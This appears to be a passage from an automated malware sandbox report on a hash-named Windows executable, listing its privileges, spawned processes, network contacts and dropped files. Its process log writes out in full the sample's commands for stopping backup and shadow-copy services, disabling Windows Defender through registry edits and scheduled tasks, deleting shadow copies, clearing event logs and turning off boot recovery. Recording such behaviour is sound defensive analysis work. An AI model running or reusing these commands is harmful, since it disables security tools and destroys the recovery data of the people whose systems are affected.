| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe
"C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_12dde" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_12dde" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_12dde" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | time.windows.com | udp |
| US | 168.61.215.74:123 | time.windows.com | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | daca2eb0c15c4b16335f40f34f730407 |
| SHA1 | 492da0ed645ed1b2a52c6ac6ae17f7b1ade086d8 |
| SHA256 | b1d1833e6e44405d6ce5eb3b4fa74b4964429873469c9ee96addd839bcb3e442 |
| SHA512 | 1cfd87ace13a58a07ae53101d86fbc3f908762254091df81e49d00cafb74cfa2a3e214d86ce2ed5e5ce57a10a935aee1790f80a28025cf12651535d7956e5589 |